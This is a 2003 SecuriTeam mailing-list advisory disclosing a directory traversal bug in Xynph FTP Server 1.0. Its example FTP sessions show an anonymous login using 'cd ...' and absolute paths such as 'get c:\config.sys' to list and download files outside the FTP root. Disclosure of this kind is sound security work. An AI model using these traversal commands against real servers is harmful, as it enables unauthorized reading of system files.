[NT] Directory Traversal Bug Found in Xynph FTP Server
From: support@securiteam.com
Date: 01/21/03
- Previous message: support@securiteam.com: "[TOOL] Malloc() WebMiner, Web Server File and Directory Enumerator (Miner)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 21 Jan 2003 18:20:06 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Directory Traversal Bug Found in Xynph FTP Server
------------------------------------------------------------------------
SUMMARY
A security vulnerability in Xynph FTP server allows remote attackers to
traverse into directories below those bounded by the FTP root, by using a
triple dot attack (...) and to download any file they wish to by providing
the program with a complete path to the file (i.e. c:\config.sys).
DETAILS
Vulnerable systems:
* Xynph FTP Server 1.0
Example (Directory Traversal):
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen! <-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 .
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 ..
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Programme
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 command.com
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Autoexec.bat
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 config.sys
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Windows
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Cygwin
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################
Further, you can read all drives present on the computer.
Example (Downloading files from anywhere):
#######################################################
Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen! <-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:\
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 305113 Dec 15 2002 1.jpg
-rw-rw-rw- 1 ftp ftp 313497 Dec 15 2002 4.jpg
-rw-rw-rw- 1 ftp ftp 326046 Dec 15 2002 2.jpg
-rw-rw-rw- 1 ftp ftp 357910 Dec 15 2002 3.jpg
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>
#######################################################
ADDITIONAL INFORMATION
The information has been provided by <mailto:zero-x@linuxmail.org> Zero-X
www.lobnan.de Team.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[UNIX] CVS Remote Vulnerability"
- Previous message: support@securiteam.com: "[TOOL] Malloc() WebMiner, Web Server File and Directory Enumerator (Miner)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Windows FTP Client Allows File Transfer Location Tampering (MS05-044)
... Get your security news from a reliable source. ... A tampering vulnerability
exists in the Windows FTP client. ... * Microsoft Windows Server 2003 for Itanium-based
Systems - ... (Securiteam) - [NEWS] Symantec Enterprise Firewall FTP Bounce Vulnerability (Patch Available)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Raptor Firewall FTP Bounce
Vulnerability. ... PORT command referenced a destination that doesn't ... (Securiteam) - [UNIX] SafeTP Reveals Internal Server IP Addresses
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Protocol) to connect to their
accounts on UNIX or NT/2000 FTP servers. ... check out the "227 Entering Passive Mode
... Timed out waiting for connection from server. ... (Securiteam) - RE:[fw-wiz] Vulnerability Scanners ( was: concerning ~el8 / project mayhem )
... >>access control should be in place that prevents FTP traffic ... >>w.x.y.z
is running an FTP server and you can access it. ... One major provider with a foot in the
security realm has had ... Of course doing that documentation would impact ...
(Firewall-Wizards) - RE: FTP server security.
... If you apply proper access controls to the folder structure, ... Security
Business Unit ... Subject: FTP server security. ... most highly-anticipated
industry event of the year. ... (Focus-Microsoft)
